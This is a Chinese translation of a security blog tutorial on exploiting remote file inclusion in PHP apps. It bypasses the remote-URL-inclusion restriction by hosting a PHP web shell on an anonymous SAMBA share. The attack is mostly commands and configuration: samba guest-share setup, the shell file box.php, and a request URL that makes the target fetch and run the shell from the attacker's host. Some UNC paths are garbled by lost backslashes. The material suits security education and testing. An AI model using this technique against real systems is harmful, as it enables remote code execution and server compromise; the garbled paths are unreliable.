當我試圖從遠程主機包含PHP Web shell時,應用程序拋出錯誤,RFI沒有發生。
使用匿名讀取訪問許可權配置SAMBA伺服器(Linux計算機)
使用下面提到的命令安裝SAMBA伺服器:
apt-get install samba
創建SMB共享目錄(在本文中是/var/www/html/pub/)
mkdir /var/www/html/pub/
在新創建的SMB共享目錄上配置許可權:
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
運行以下命令刪除SAMBA伺服器配置文件的默認內容
echo > /etc/samba/smb.conf
將下面的內容放入「/etc/samba/smb.conf」文件中
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
現在,重啟SAMBA伺服器以應用配置文件/etc/samba/smb.conf中的新配置
service smbd restart
成功重啟SAMBA伺服器後,嘗試訪問SMB共享,並確保SAMBA伺服器不要求憑據。
在本文中,SAMBA伺服器IP是192.168.0.3,我需要訪問Windows文件資源管理器中的SMB共享, 如下所述:
\192.168.0.3
在SMB共享中託管PHP Web shell
很好,SMB共享是可訪問的,並顯示目錄「ica」是存在的。
現在,在目錄「/var/www/html/pub」中託管PHP shell,這是SMB共享「ica」的目錄。
一旦我們在目錄「/var/www/html/pub」中有了PHP shell,就可以使用Windows文件資源管理器訪問SMB共享目錄ica。
\192.168.0.3ica
您將看到PHP shell存在是SMB共享目錄。在本文中,它是box.php
攻擊文件包含易受攻擊的參數
完美,讓我們使用這個PHP shell SMB鏈接,並使用易受攻擊的PHP代碼瀏覽它。
http://vulnerable_application/page.php?page=\192.168.0.3icaox.php
噹噹!易受攻擊的PHP代碼從SMB共享中獲取Web shell,並在應用程序伺服器上執行代碼。我們已經繞過了限制,並包含了託管在遠程主機上的Web shell。
本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場
來源:利用PHP應用程序中的遠程文件包含(RFI)並繞過遠程URL包含限制|NOSEC安全訊息平臺 - 白帽匯安全研究院
原文:http://www. mannulinux.org/2019/05/ exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
白帽匯從事信息安全,專註於安全大數據、企業威脅情報。
公司產品:FOFA-網路空間安全搜索引擎、FOEYE-網路空間檢索系統、NOSEC-安全訊息平臺。
為您提供:網路空間測繪、企業資產收集、企業威脅情報、應急響應服務。
推薦閱讀: